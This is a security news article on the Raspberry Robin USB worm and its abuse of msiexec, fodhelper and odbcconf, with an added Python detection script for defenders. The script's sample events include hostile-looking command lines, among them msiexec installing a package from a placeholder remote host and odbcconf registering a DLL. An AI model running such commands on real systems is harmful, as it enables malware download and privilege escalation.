Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads via external USB drives.
Red Canary tracks the activity cluster behind this malware as Raspberry Robin; it was first observed in September 2021.
Red Canary’s Detection Engineering team detected the worm on the networks of multiple clients, some in the technology and manufacturing sectors.
Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is plugged in.
Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.
Legitimate Windows tools abused to install malware
The worm uses Microsoft's standard installer (msiexec.exe) to communicate with its command and control (C2) servers, which are likely hosted on compromised QNAP devices, with TOR exit nodes serving as additional C2 infrastructure.
“While msiexec.exe downloads and executes legitimate installation packages, it is also exploited by adversaries to distribute malware,” the researchers said.
“Raspberry Robin uses msiexec.exe to attempt communication from an external network to a malicious domain for C2 purposes.”
Although the researchers have not yet determined whether, or by what method, the worm establishes persistence, they suspect that it installs a malicious DLL on compromised machines so that it survives reboots and resists deletion.
Raspberry Robin launches this DLL with the help of two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows setup) and odbcconf (a tool for configuring ODBC drivers).
The former lets the malware bypass User Account Control (UAC), while the latter is used to load and configure the DLL.
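The behaviour chain described above (cmd.exe launched from a removable drive, msiexec.exe reaching out to a remote URL, fodhelper.exe spawning a child, odbcconf.exe registering a DLL) is what a detection engineer would turn into process-creation rules. The following is an added example, not code from the Red Canary report or from the malware: it runs four such checks over constructed process events shaped like Sysmon Event ID 1 records. The sample command lines, paths and domain are invented for the example and are not indicators of compromise; the removable-drive heuristic (any drive letter other than C:) and the odbcconf `-a {REGSVR ...}` pattern are assumptions about how the technique looks in telemetry, not facts from the page.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (assumed Sysmon Event ID 1-like shape)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events for this example only; none are real IOCs.
SAMPLE_EVENTS = [
    # explorer.exe running cmd.exe against a file on a non-C: drive (USB .LNK launch)
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /R "E:\setup.bat"'),
    # msiexec.exe asked to install a package from a remote URL (C2 contact)
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /q /i http://example.invalid/pkg.msi"),
    # fodhelper.exe (auto-elevated) spawning odbcconf.exe to register a DLL
    ProcEvent(r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\odbcconf.exe",
              r"odbcconf.exe -a {REGSVR C:\Users\Public\x.dll}"),
    # benign local MSI install; must not be flagged
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r'msiexec /i "C:\Users\alice\Downloads\7z.msi"'),
]

REMOVABLE_DRIVE = re.compile(r"\b[D-Z]:\\", re.I)   # heuristic: anything but C:
REMOTE_URL = re.compile(r"https?://", re.I)
REGSVR_DLL = re.compile(r"regsvr\b.*\.dll", re.I)


def _name(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_usb_lnk_launch(ev: ProcEvent) -> bool:
    """explorer.exe -> cmd.exe whose command line references a non-C: drive."""
    return (_name(ev.parent_image) == "explorer.exe"
            and _name(ev.image) == "cmd.exe"
            and bool(REMOVABLE_DRIVE.search(ev.command_line)))


def is_msiexec_remote_install(ev: ProcEvent) -> bool:
    """msiexec.exe given an http(s) URL instead of a local package."""
    return _name(ev.image) == "msiexec.exe" and bool(REMOTE_URL.search(ev.command_line))


def is_fodhelper_child(ev: ProcEvent) -> bool:
    """Any process spawned by fodhelper.exe: it normally launches nothing."""
    return _name(ev.parent_image) == "fodhelper.exe"


def is_odbcconf_dll_load(ev: ProcEvent) -> bool:
    """odbcconf.exe used to register (load) an arbitrary DLL."""
    return _name(ev.image) == "odbcconf.exe" and bool(REGSVR_DLL.search(ev.command_line))


CHECKS = [
    ("usb_lnk_launch", is_usb_lnk_launch),
    ("msiexec_remote_install", is_msiexec_remote_install),
    ("fodhelper_child", is_fodhelper_child),
    ("odbcconf_dll_load", is_odbcconf_dll_load),
]


def triage(events) -> list:
    """Return (rule_name, command_line) for every check that fires on each event."""
    return [(name, ev.command_line)
            for ev in events
            for name, check in CHECKS
            if check(ev)]


if __name__ == "__main__":
    for rule, cmdline in triage(SAMPLE_EVENTS):
        print(f"{rule:24s} {cmdline}")
```

Each rule on its own is noisy (users do run cmd.exe against USB drives, and msiexec can legitimately install from a URL); the value is in correlating two or more of them on the same host within a short window, which is how the third sample event fires twice. Tune the drive-letter heuristic to your fleet's actual removable-media drive letters, or replace it with the drive type from your EDR's telemetry.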
How and why?
While Red Canary analysts have been able to closely inspect what the newly discovered worm does on infected systems, several questions remain unanswered.
“First of all, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although this is likely to happen offline or out of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said.
“One hypothesis is that it may be an attempt to establish persistence on an infected system, although additional information is required to build confidence in that hypothesis.”
Since nothing is yet known about the malware's final-stage payload, another open question is what the Raspberry Robin operators are ultimately after.
More technical information about the Raspberry Robin worm, including Indicators of Compromise (IOCs) and an ATT&CK mapping of its observed behaviour, can be found in the Red Canary report.